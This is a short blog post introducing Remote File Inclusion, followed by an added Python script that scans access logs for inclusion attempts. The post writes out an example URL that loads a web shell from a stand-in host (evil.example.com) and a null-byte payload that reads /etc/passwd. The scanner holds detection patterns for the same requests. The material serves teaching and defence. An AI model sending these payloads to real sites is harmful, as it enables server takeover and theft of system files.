Irregular Expressions

Aug 29 2012   7:50PM GMT

Remote File Inclusions

Dan O'Connor

I am currently testing a few PHP shells that I have against a test PHP site I created, and I thought I would share some of the basics of an RFI (Remote File Inclusion). When I need to deal with web apps, this is the second thing I will try, right after SQL injection.

Here is the Wikipedia article for another explanation.

In most cases I would use this to either display the contents of a file or execute another PHP script, like a PHP-based shell. If I am not really sure what I am looking for, I will use a PHP-based shell, something like this.

Typically what I will do is crawl the site, look for variables on each page, and attempt something like this (borrowed from the Wikipedia example).

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?

This is a very simple and powerful method of attacking sites.
It can also be used for local file traversal: instead of a remote file, you can specify a local file.

/vulnerable.php?COLOR=/etc/passwd%00

In these cases the %00 is very important for your success.
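
Both request shapes shown above stand out in web server access logs, which is where a defender would look for them. The following is an added example, not code from the original post: the log lines are constructed, and the function names and patterns are assumptions chosen for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (not real traffic); the two requests from
# 203.0.113.9 reuse the URLs shown in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2012:19:50:01 +0000] "GET /vulnerable.php?COLOR=blue HTTP/1.1" 200 512
203.0.113.9 - - [29/Aug/2012:19:50:07 +0000] "GET /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? HTTP/1.1" 200 2048
203.0.113.9 - - [29/Aug/2012:19:50:12 +0000] "GET /vulnerable.php?COLOR=/etc/passwd%00 HTTP/1.1" 200 1337
198.51.100.7 - - [29/Aug/2012:19:51:30 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 0
198.51.100.8 - - [29/Aug/2012:19:52:00 +0000] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a URL or PHP stream wrapper, not a name.
REMOTE_SCHEME_RE = re.compile(r"^\s*(?:https?|ftp|php|data)://", re.I)
# Directory traversal, or an absolute path into common system directories.
LOCAL_PATH_RE = re.compile(r"(?:^|[\\/])\.\.[\\/]|^/(?:etc|proc|var)/")


def classify(value):
    """Return the reasons a URL-decoded parameter value looks like an inclusion attempt."""
    reasons = []
    if REMOTE_SCHEME_RE.match(value):
        reasons.append("remote-url")
    if "\x00" in value:  # %00 decodes to a NUL byte
        reasons.append("null-byte")
    if LOCAL_PATH_RE.search(value):
        reasons.append("local-path")
    return reasons


def scan(log_text):
    """Return (client_ip, parameter, reasons) for every suspicious query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        _, _, query = m.group(1).partition("?")
        # parse_qsl URL-decodes values, so encoded payloads are checked too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify(value)
            if reasons:
                findings.append((line.split()[0], name, reasons))
    return findings


if __name__ == "__main__":
    for ip, name, reasons in scan(SAMPLE_LOG):
        print(ip, name, ",".join(reasons))
```

These are heuristics: a parameter that legitimately carries a URL, such as a redirect target, will also be flagged and needs an allowlist.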
